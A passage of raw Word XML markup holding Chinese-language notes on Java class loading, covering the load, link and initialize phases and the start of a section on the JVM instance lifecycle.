          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00F24D31" w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>这一步是可选的</w:t>
      </w:r>
      <w:r w:rsidR="00F24D31" w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F24D31" w:rsidRPr="00A3303D" w:rsidRDefault="00276F80" w:rsidP="00A3303D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00F24D31" w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>初始化</w:t>
      </w:r>
      <w:r w:rsidR="00F24D31" w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F24D31" w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>初始化静态变量，静态代码块。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F24D31" w:rsidRPr="00A3303D" w:rsidRDefault="00276F80" w:rsidP="00A3303D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00F24D31" w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>这样的过程在程序调用类的静态成员的时候开始执行，所以静态方法</w:t>
      </w:r>
      <w:r w:rsidR="00F24D31" w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>main()</w:t>
      </w:r>
      <w:r w:rsidR="00F24D31" w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>才会成为一般程序的入口方法。类的构造器也会引发该动作。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B4277" w:rsidRPr="00A3303D" w:rsidRDefault="00276F80" w:rsidP="00A3303D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="000B4277" w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r w:rsidR="000B4277" w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>将类加载过程划分为三个步骤：装载、链接和初始化。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B4277" w:rsidRPr="00A3303D" w:rsidRDefault="00276F80" w:rsidP="00A3303D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="000B4277" w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>装载（</w:t>
      </w:r>
      <w:r w:rsidR="000B4277" w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Load</w:t>
      </w:r>
      <w:r w:rsidR="000B4277" w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）：装载过程负责找到二进制字节码并加载至</w:t>
      </w:r>
      <w:r w:rsidR="000B4277" w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r w:rsidR="000B4277" w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>中，</w:t>
      </w:r>
      <w:r w:rsidR="000B4277" w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r w:rsidR="000B4277" w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>通过类的全限定名（</w:t>
      </w:r>
      <w:r w:rsidR="000B4277" w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>com.bluedavy. HelloWorld</w:t>
      </w:r>
      <w:r w:rsidR="000B4277" w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）及类加载器（</w:t>
      </w:r>
      <w:r w:rsidR="000B4277" w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ClassLoaderA</w:t>
      </w:r>
      <w:r w:rsidR="000B4277" w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>实例）完成类的加载；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B4277" w:rsidRPr="00A3303D" w:rsidRDefault="00276F80" w:rsidP="00A3303D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="000B4277" w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>链接（</w:t>
      </w:r>
      <w:r w:rsidR="000B4277" w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Link</w:t>
      </w:r>
      <w:r w:rsidR="000B4277" w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）：链接过程负责对二进制字节码的格式进行校验、初始化装载类中的静态变量及解析类中调用的接口、类；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00147AB0" w:rsidRDefault="00276F80" w:rsidP="00CB1B33">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="000B4277" w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>初始化（</w:t>
      </w:r>
      <w:r w:rsidR="000B4277" w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Initialize</w:t>
      </w:r>
      <w:r w:rsidR="000B4277" w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）：执行类中的静态初始化代码、构造器代码及静态属性的初始化。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F27C8D" w:rsidRDefault="00F27C8D" w:rsidP="00CB1B33">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F27C8D" w:rsidRPr="008232D6" w:rsidRDefault="00F27C8D" w:rsidP="00F27C8D">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>1.2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>7.2</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:t>类加载机制</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F27C8D" w:rsidRDefault="00F27C8D" w:rsidP="00CB1B33">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F27C8D" w:rsidRDefault="00F27C8D" w:rsidP="00F27C8D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="316" w:lineRule="atLeast"/>
        <w:ind w:left="351"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>一、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404040"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="11"/>
        </w:rPr>
        <w:t>        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404040"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="11"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>的生命周期</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F27C8D" w:rsidRDefault="00F27C8D" w:rsidP="00F27C8D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="316" w:lineRule="atLeast"/>
        <w:ind w:left="301"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404040"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="11"/>
        </w:rPr>
        <w:t>      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404040"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="11"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>实例对应了一个独立运行的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>程序它是进程级别</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F27C8D" w:rsidRDefault="00F27C8D" w:rsidP="00F27C8D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="316" w:lineRule="atLeast"/>
        <w:ind w:left="701"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>a)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404040"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="11"/>
        </w:rPr>
        <w:t>    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404040"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="11"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>启动。启动一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>程序时，一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>实例就产生了，任何一个拥有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>public static void main(String[] args)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>函数的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>都可以作为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>实例运行的起点</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F27C8D" w:rsidRDefault="00F27C8D" w:rsidP="00F27C8D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="316" w:lineRule="atLeast"/>
        <w:ind w:left="701"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>b)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404040"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="11"/>
        </w:rPr>
        <w:t>    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404040"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="11"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>运行。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>main()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>作为该程序初始线程的起点，任何其他线程均由该线程启动。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
